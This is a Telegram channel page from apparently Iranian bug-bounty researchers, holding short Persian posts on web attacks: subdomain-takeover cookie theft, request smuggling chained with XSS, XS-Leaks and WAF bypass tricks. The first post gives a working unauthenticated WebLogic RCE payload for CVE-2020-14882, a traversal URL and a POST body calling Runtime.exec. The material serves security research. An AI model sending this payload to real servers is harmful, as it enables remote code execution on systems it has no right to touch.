Web_Priv8
766 subscribers
405 photos
24 videos
45 files
588 links
Sina Doosti @r00t98
Web Security Researcher, Bug Hunter
https://twitter.com/r00t98

Amir Hasanvand @al9n3_wolf
Web Security Researcher, Bug Hunter
https://twitter.com/al9n3_wolf
Download Telegram
آسیب پذیری RCE در weblogic
بدون نیاز به احراز هویت

CVE-2020–14882

https://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal

POST:

_nfpb=true&_pageLabel=&handle=https://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)


https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf

#weblogic
#rce
#java


@sec_nerd
Subdomain Takeover to Authentication bypass

یکی از تٲثیر های تصاحبِ زیردامنه یا Subdomain Takeover مربوط به دزدیدن کوکی های دامین اصلی میشه، برای مثال کوکی های x.com به دامنه تصاحب شده مثل z.x.com ارسال میشن(طبق RFC 6265)، حالا اینجا POC چیه؟ سادس، هکر برا گرفتن کوکی دوتا راه داره:
1- با زبان سمت سرور کوکی رو بگیره، مثلا فایل PHP اپلود کنه رو زیردامنه تصاحب شده.
2- با جاوااسکریپت کوکی رو بگیره، اینجاهم مثل اپلود HTML و بقیه موارد.

مزیت مورد اول نسبت به مورد دوم این هست که دیگه فلگِ HttpOnly اینجا معنی نمیده و هکر حتی با وجود فلگِ HttpOnly میتونه کوکی رو بگیره.
این گزارش دقیقا مثل مورد اوله و یه POC دیگه برا اکسپلویت CORS هم معرفی کرده.

#ATO
#BugBounty
#SubdomainTakeover

@web_priv8
Tunneling TCP over DNS

#OOB
#DNS
#RedTeam

@web_priv8
دیدید بعضی وقت ها یسری XSS هایی که میگیرید قابل اکسپلویت نیست؟ مثل XSS از طریق هدرِ User-Agent یا هدرِ دیگه ای، اینجا محقق یه آسیب پذیری Request Smuggling گرفته و اومده اونو با یه XSS که از طریق هدر اتفاق میفتاده رو ترکیب و اکسپلویت کرده.

https://www.rcesecurity.com/2020/11/Smuggling-an-un-exploitable-xss/

#XSS
#Smuggling
#BugBounty

@web_priv8
تکنیک های مدرنِ بایپس WAF برای حملات اتوماتیک.

https://www.infoq.com/presentations/waf-scripting-techniques-autonomous-attacks/

#WAF
#Bypass

@web_priv8
نوع جدیدی از حملات Side-Channel روی وب: حملات XS-Leaks

در حملات CSRF، مهاجم از یک منبع دیگه (مثلا وبسایت خودش)، می‌تونه بواسطه‌ی فرد قربانی، کنش‌های مدنظرشو روی یه وبسایت خاص (مثل پرتال بانک فرد قربانی) انجام بده. توی XS-Leaks این قضیه برعکسه: با انجام کنش‌هایی روی وبسایتی خاص (مثل بانک فرد قربانی)، می‌شه اطلاعاتی از قربانی بدست اورد. این نوع جدیدی از بردار حملاته که در سطح وب می‌تونه فراگیر بشه. این وبسایت، مستندات جامعی از این حملات داره.
@offsecmag
چرا فایروال‌های تحت وب دور می‌خورند و عموما بدردنخورند؟ مورد ۴۵۶۷ام.

اضافه‌شدن یک کاراکتر (0x0A) به پیلود حمله، بعنوان یک بلوک از داده‌های بی‌مصرف (Padding)، فایروال رو جوری گمراه می‌کنه که اون بلوک (که در اینجا یک کاراکتر هست) رو حذف کنه و بقیه پیلود (که مخرب هست) رو نادیده بگیره. این موردی از کلودفلیر بود.
@offsecmag